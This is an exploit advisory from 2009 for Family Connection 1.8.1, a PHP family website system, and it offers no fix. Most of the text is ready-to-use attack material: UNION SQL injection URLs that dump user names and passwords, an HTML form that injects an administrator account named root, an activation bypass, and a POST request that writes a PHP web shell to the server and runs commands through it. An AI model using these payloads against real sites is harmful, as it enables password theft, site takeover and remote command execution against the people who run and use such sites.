Family Connection 1.8.1 Multiple Remote Vulnerabilities

******* Salvatore \"drosophila\" Fresta ******* [+] Application: Family Connection [+] Version: 1.8.1 [+] Website: http://www.familycms.com [+] Bugs: [A] Multiple SQL Injection [B] Create Admin User [C] Blind SQL Injection [+] Exploitation: Remote [+] Date: 25 Mar 2009 [+] Discovered by: Salvatore \"drosophila\" Fresta [+] Author: Salvatore \"drosophila\" Fresta [+] Contact: e-mail: drosophilaxxx@gmail.com ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = on/off These bugs allows a registered user to view username and password of all registered users. - [B] Create Admin User [-] Requisites: magic_quotes_gpc = off [-] File affected: register.php, activate.php This bug allow a guest to create an account with administrator privileges. - [C] Blind SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: lostpw.php ************************************************* [+] Code - [A] Multiple SQL Injection http://www.site.com/path/addressbook.php?letter=-1%25\' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23 - [B] Create Admin User <html> <head> <title>Family Connection 1.8.1 Create Admin User Exploit</title> </head> <body> <p>This exploit creates an user with administrator privileges using follows information:<br> Username: root<br> Password: toor<br> <form action=\"http://localhost/fcms/register.php\" method=\"POST\"> <input type=\"hidden\" name=\"username\" value=\"blabla\"> <input type=\"hidden\" name=\"password\" value=\"blabla\"> <input type=\"hidden\" name=\"email\" value=\"blabla@blabla.blabla\"> <input type=\"hidden\" name=\"fname\" value=\"blabla\"> <input type=\"hidden\" name=\"lname\" value=\"blabla\"> <input type=\"hidden\" name=\"year\" value=\"00-00-000\',\'fakeuser\',\'fakepassword\'), (1, NOW(), \'root\', \'root\', \'root@owned.com\', \'00-00-00\', \'root\', \'7b24afc8bc80e548d66c4e7ff72171c5\')#\'\"> <input type=\"submit\" name=\"submit\" value=\"Exploit\"> </form> </body> </html> To activate accounts: http://www.site.com/path/activate.php?uid=1 or 1=1&code= [C] Blind SQL Injection POST /path/lostpw.php HTTP/1.1\\r\\n\" Host: www.site.com\\r\\n\" Content-Type: application/x-www-form-urlencoded\\r\\n\" Content-Length: 193\\r\\n\\r\\n\" email=-1\' UNION ALL SELECT \'<?php echo \"<pre>\"; system($_GET[cmd]); echo \"</pre><br><br>\";?>\',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE \'/var/www/htdocs/path/rce.php\'# To execute commands: http://www.site.com/path/rce.php?cmd=ls ************************************************* [+] Fix No fix. *************************************************